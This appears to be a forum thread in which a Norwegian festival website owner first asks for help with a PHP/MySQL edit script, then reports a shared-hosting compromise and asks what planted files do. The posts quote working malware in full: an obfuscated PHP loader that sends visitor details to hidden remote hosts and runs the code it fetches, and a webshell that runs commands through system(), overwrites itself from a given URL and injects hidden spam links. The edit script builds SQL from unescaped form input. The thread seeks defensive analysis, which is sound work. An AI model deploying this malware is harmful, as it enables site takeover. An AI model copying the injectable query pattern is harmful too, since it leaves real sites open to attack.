anubis

Greetings good people. I'm having some trouble with this script. This is the edit part of a homebrewed resource management system. It worked a couple of months ago, and it's not working anymore. I'm getting this error: Du fylte ikke inn skjemaet korrekt (Norwegian for "You didnt fill out the form correctly"): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 I'm guessing there has been a version change on my server that makes this script not work anymore. Any pointers in the right direction would be appreciated. <?php mb_http_input("utf-8"); mb_http_output("utf-8"); //check if user is logged in session_start(); if(!session_is_registered(username)){ header("location:index.php"); } $regusername = $_SESSION['username']; //include MySql connection info include("db.php"); //extract posted data extract($_POST); $id = $_GET["id"]; //connect to database mysql_select_db("*****", $dbcnx); if (! @mysql_select_db("*****") ) { echo( "<P>Unable to locate the database at this time.</P>" ); exit(); } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <!-- DW6 --> <head> <!-- Copyright 2005 Macromedia, Inc. All rights reserved. --> <title>Månefestivalen</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="mm_spa.css" type="text/css" /> </head> <body bgcolor="#990000"> <table width="800" border="0" align="center" cellpadding="1" cellspacing="0" id="header"> <tr class="darkBluebg"> <td colspan="4" valign="middle" nowrap="nowrap"> <div align="center"><img src="../img/topp.gif" width="852" height="171" /></div> </td> </tr> <tr> <td colspan="2" class="lightBluebg"> <div align="center"> <a href="list.php" class="one">Hjem</a> | <a href="new.php" class="one">Ny Frivillig</a> | <a href="epost.php" class="one">E-postlister</a> | <a href="http://www.maanefestivalen.no/" class="one">maanefestivalen.no </a> | <a href="logout.php" class="one">Logg ut (<?php echo($regusername); ?>)</a></div> </td> </tr> <tr> <td colspan="2"> <div align="center"> <?php if ("1" == $endre) { $sql = "UPDATE frivillige SET navn='$navn', tlf='$tlf', alder='$alder', epost='$epost', oppg='$oppg', erfaring='$erfaring', vurdering='$vurdering', plass='$plass', adresse='$adresse', naar='$naar' WHERE id =$id"; if (mysql_query($sql)) { echo("<table width=\"400\" border=\"0\" cellpadding=\"1\" cellspacing=\"1\" class=\"Buttons\">"); echo("<tr><td>"); echo("Du har nå endret informasjonen om $navn.<br>"); echo("</td></tr></table>"); } else { echo("<P>Du fylte ikke inn skjemaet korrekt: " . mysql_error() . "</P>"); } } $result = mysql_query("SELECT * FROM frivillige WHERE id='$id'"); $row = mysql_fetch_array($result); if (!$result) { echo("<P>Error performing query: " . mysql_error() . "</P>"); exit(); } ?> <form id="nyfrivillig" name="nyfrivillig" method="post" action="<?php echo($PHP_SELF); ?>"> <br /> <table border="1" align="center" cellpadding="1" cellspacing="1" bordercolor="#220103" class="Titles"> <tr> <td colspan="2" class="listtxttwo"><div align="center" class="TitlesUppercase">Endre info om <?php echo($row["navn"]); ?></div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Navn:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <input name="navn" type="text" class="Text" value="<?php echo($row["navn"]); ?>" size="45" /> </div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Tlf nr:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <input name="tlf" type="text" class="Text" value="<?php echo($row["tlf"]); ?>" size="45" /> </div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Alder:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <input name="alder" type="text" class="Text" value="<?php echo($row["alder"]); ?>" size="45" /> </div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Epost:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <input name="epost" type="text" class="Text" value="<?php echo($row["epost"]); ?>" size="45" /> </div></td> </tr> <tr> <td valign="top" class="listtxttwo">Adresse:</td> <td align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <input name="adresse" type="text" class="Text" value="<?php echo($row["adresse"]); ?>" size="45" /> </div></td> </tr> <tr> <td valign="top" class="listtxttwo">Kan jobbe når?: </td> <td align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <select name="naar" size="1" class="Text"> <option>Før festivalen</option> <option>Under festivalen</option> <option>Etter festivalen</option> <option>Før og under</option> <option>Før og etter</option> <option>Under og etter</option> <option selected="selected">Hele tiden!</option> </select> (<?php echo($row["naar"]); ?>)</div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Ønske:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <select name="oppg" class="Text"> <option value="Scenografi">Scenografi</option> <option value="Renhold">Renhold/Miljø</option> <option value="Scenearb">Infrastruktur</option> <option value="Scenerigg">Scenerigg</option> <option value="Festivalavis">Festivalavis</option> <option value="Frivilligorganisering">Frivilligorganisering</option> <option value="Catering">Intern Catering</option> <option value="Aktiviteter">Aktiviteter/Boder</option> <option value="Dokumentasjon">Dokumentasjon</option> <option value="Backstagerigg">Akkreditering</option> <option value="Vakt">Vakt</option> <option value="Prspreder">Pr og Presse</option> <option value="Bar">Bar</option> <option value="Kiosk">Materialforvaltning</option> <option value="Billsalg">Billettsalg</option> <option value="Trans">Transport</option> <option value="Bscrew">Backstagecrew</option> <option value="Blcrew">Backlinecrew</option> <option value="Grafisk">Web/Grafisk</option> <option value="Booking">Booking</option> <option value="Artistcrew">Artisthåndtering</option> <option value="Festsjef">Festivalrådet</option> <option value="Annet" selected="selected">Til disposisjon</option> <option value="Inaktive">Inaktive/På vent</option> </select> (<?php echo($row["oppg"]); ?>)</div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Erfaring:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <textarea name="erfaring" cols="40" rows="4" class="Text"><?php echo($row["erfaring"]); ?></textarea> </div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Våre notater/<br /> Vurdering:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <textarea name="vurdering" cols="40" rows="4" class="Text"><?php echo($row["vurdering"]); ?></textarea> </div></td> </tr> <tr> <td width="97" valign="top" class="listtxttwo">Endelig oppgave:</td> <td width="305" align="left" bgcolor="#FF9900" class="listtxtone"><div align="left"> <textarea name="plass" cols="40" rows="4" class="Text"><?php echo($row["plass"]); ?></textarea> </div></td> </tr> <tr class="Buttons"> <td colspan="2" valign="top" class="listtxttwo"><div align="left"></div> <div align="center"> <input name="Submit" type="submit" class="Titles" value="Endre" /> <input type="hidden" name="endre" value="1" /> </div></td> </tr> </table> <br /> </form> </div> </td> </tr> </table> </body> </html> The names have been changed to protect the innocent. ::CHEERS::

I checked all the sites manually! First I used a reverse domain lookup tool: http://www.yougetsignal.com/tools/web-sites-on-web-server/ And then I just checked the source of all the sites on the servers. http://www.unmaskparasites.com/ does check for the linkspam I mentioned, but does nothing for the new type of numeric php files and the modified .htaccess. Googles safe browsing report isn't that bad, but I think that it only checks for malware distributing sites: http://www.google.com/safebrowsing/diagnostic?site=AS:34989 They also told me that I had malware on my machine, But I'm a network operator and know every packet that goes out (and in) of my machines. Next they'll say that it's a problem with my ISP. I'm now starting to notify the owners of domains on my shared hosting server, since STW is doing nothing. The list on http://motionthings.com is a bit outdated, and a few of the domains are cleaned up. I'm starting a dugnad http://en.wikipedia.org/wiki/Dugnad to clean my hosting server. But my guess is that they are rooted, since it's all over the place. ::CHEERS::

Sorry for bumping this old thread but I'm hoping someone can tell me what this php script does? Seems like someone is playing with my host again. <? error_reporting(0); $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI); $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF); $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING); $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER); $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR); $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME); $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE); $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw=="); if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="9ccdf4112d26d1a82b22bbe8e060b4db") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z))); else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1); $o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?> They also modify .htaccess and redirects every 404-page to the above script. ::CHEERS::

Just a quick follow up on this. A list of compromised domains on my hosting company. Seems like only linux/unix servers are affected. List here: http://motionthings.com Anyone know of a forum for this kind of things? ::CHEERS::

After looking a bit further into the issue it seems like the problem is Parallels H-sphere software. A shared hosting platform. http://www.parallels.com/uk/products/hsphere/ All the people reporting this problem seems to be hosted on h-sphere. http://www.esuli.it/index.php/2009/03/24/adsttnmq1sdioyslkjs2-attack/comments/#comments :CHEERS:

Did some more research on this and found a lot of sites on the server with the same problem. And many of them don't even use php. Talked to my hosting company, and they explained it with weak ftp passwords. I'm guessing they have a bigger problem. Stay away from the second last site in the list (http://www.magnusamundsen.com/), if you don't have noscript installed. So this seems to me like its not originating from my sites, and has nothing to do with php. Thank you for all help. [attachment deleted by admin]

Done some more research on this and found one IP trying to access one of the directories I did not put there. From apache log: 89.149.242.216 - - [06/May/2009:03:20:18 +0200] "POST /axtdn/oit.php HTTP/1.0" 200 0 "-" "-" If you have a look at the source of http://maanefestivalen.no you'll find a funny thing. Some kind of linkspam, and lots of it! (Just scroll to the bottom) Same for a couple of other domains on the same server. http://maanen.no and http://motionthings.com I'm removing this tomorrow. This has been a fun experience.

The site in question is http://maanefestivalen.com. (Sorry, only norwegian) It's running Wordpress 2.7.1, with a bunch of plugins. The zipfile wasn't uploaded to my server. I zipped the folder, and posted it here. And I really don't see any danger in opening a zipfile. The first file that had random names throughout my entire ftp server (this one was called sfd.php ) contains this: <?php ignore_user_abort(1); set_time_limit(0); function Clear() { unlink("c"); unlink("1r"); unlink("log"); } function Clear2() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = preg_replace('#<a[^>]+\_lm[^>]*>.*?</a>#is', '', $fin); $fin = preg_replace("/http(.*?)tmp6(.*?)\<\/a\>/", "", $fin); $fin = ereg_replace("<!--dd4-->", "", $fin); $fin = ereg_replace("<!--dd5-->", "", $fin); $fin = ereg_replace("<font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">", "", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); echo " upt-ok"; } function GetVar($name, &$var) { $var = ""; if (isset($_POST[$name])) $var = $_POST[$name]; if (isset($_GET[$name])) $var = $_GET[$name]; if (($var) =="") return false; else return true; } function Gen() { $alp = "abcdefghiklmnjsweqrtyuiopzx"; $maps = array(); if (isset($_POST["sg"])) $sg = $_POST["sg"]; if (isset($_GET["sg"])) $sg = $_GET["sg"]; if (isset($_POST["gm"])) $g = $_POST["gm"]; if (isset($_GET["gm"])) $g = $_GET["gm"]; $path = ""; $fr = fopen("1r", "a+"); if (file_exists("c")) { $fconf = file("c"); $tname = trim($fconf[0]); $cname = trim($fconf[1]); $curs = trim($fconf[2]); $pid = trim($fconf[3]); if ($pid == 100) { $pid = 0; $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); $curs = $g; } } else { $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<5; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $tname = $nm; $pid = 0; $curs = $g; mkdir($tname); $fht = fopen("$tname/.htaccess", "w+"); $htname = $sg."2.txt"; $fp = fopen($htname, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); fwrite($fht, $fin); fclose($fht); $rnd = mt_rand(0, 999); $nm = ""; for ($i=0; $i<3; $i++) { $ran = mt_rand(0,26); $sym = $alp[$ran]; $nm = $nm.$sym; } $cname = $nm; mkdir("$tname/$cname"); } $gname = $sg."sgen.php"; for ($j=$pid; $j<$pid+10; $j++) { $fp = fopen($gname."?g=$curs", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_$j.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); } if ($j==100) { $fp = fopen($gname."?g=$curs&m=1", "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fnd = fopen("$tname/$cname/$curs"."_lm.htm", "w+"); fwrite($fnd, $fin); fclose($fnd); $map = "$path/$tname/$cname/$curs"."_lm.htm"; fwrite($fr,"$map\n"); } $fconf = fopen("c", "w+"); fwrite($fconf, $tname."\n"); fwrite($fconf, $cname."\n"); fwrite($fconf, $curs."\n"); $nj = $j; fwrite($fconf, $nj."\n"); fclose($fconf); } function Update() { $thisname = "1.php"; if (isset($_POST['u'])) $u = $_POST['u']; if (isset($_GET['u'])) $u = $_GET['u']; $fp = fopen($u, "r"); $fin = ''; while (!feof($fp)) { $fc = fgets($fp, 1024); if (!$fc) break; $fin .= $fc; } fclose($fp); $fthis = fopen($thisname, "w+"); fwrite($fthis, $fin); fclose($fthis); } function Com() { if (isset($_POST['c'])) @system($_POST['c']); if (isset($_GET['c'])) @system($_GET['c']); } function UpKos() { $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); $fin = ereg_replace("adsttnmq1", "<adsttnmq1>", $fin); $fin = ereg_replace("sdioyslkjs2", "<sdioyslkjs2>", $fin); $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function MRepl() { $mpt = ""; $drs = ""; $begtag = "<adsttnmq1><font style=\"position: absolute;overflow: hidden;height: 0;width: 0\">"; $endtag = "</font></body></html><sdioyslkjs2> "; $mrd = trim(file_get_contents("m")); $pt = "../$mrd"; $fin = file_get_contents($pt); GetVar("mpt", $mpt); // óäàëÿåì çàâåðøàþùèå õòìë òåãè $fin = preg_replace ("/<\/body>/i", "", $fin); $fin = preg_replace ("/<\/html>/i", "", $fin); $fin = ereg_replace("<!--dd4-->(.*)<!--dd5-->", "", $fin); $fin = ereg_replace("<adsttnmq1>(.*)<sdioyslkjs2>", "", $fin); $fp = fopen($mpt, "r"); GetVar("drs", $drs); $fin = $fin.$begtag; $drs = str_replace("\\", "", $drs); $fin = $fin.$drs; $fin = $fin.$endtag; $fmrd = fopen($pt, "w+"); fwrite($fmrd, $fin); fclose($fmrd); } function Main() { if (isset($_POST['u']) || isset($_GET['u'])) { Update(); exit(); } if (isset($_POST['c']) || isset($_GET['c'])) { Com(); exit(); } if (isset($_POST['uk']) || isset($_GET['uk'])) { UpKos(); exit(); } if (isset($_POST['g']) || isset($_GET['g'])) { Gen(); exit(); } if (isset($_POST['s']) || isset($_GET['s'])) { MRepl(); exit(); } if (isset($_POST['cl']) || isset($_GET['cl'])) { Clear(); exit(); } if (isset($_POST['cl2']) || isset($_GET['cl2'])) { Clear2(); exit(); } echo "<ok>"; } Main(); ?> The second file, named only "m" in all directories "they" put on my server contained only this. index.php But really, they must have cracked my ftp password. Because these directories were all over the place. What I'm interested in is what this php script is meant to do. :CHEERS:

Hi, On my FTP-server I found some strange files today. In several directories. I'm attaching a zip with the files from one directory. The zip is named after the folder i found. Could anyone tell me what this php file does? It looks like it's changing permissions on files. But I'm not sure. And could someone help me find all of them. How would I search for it. The m file seems to be the only one appearing in all rogue directories. And yes, I have changed my FTP pass. Any musings on this subject would be much appreciated. [attachment deleted by admin]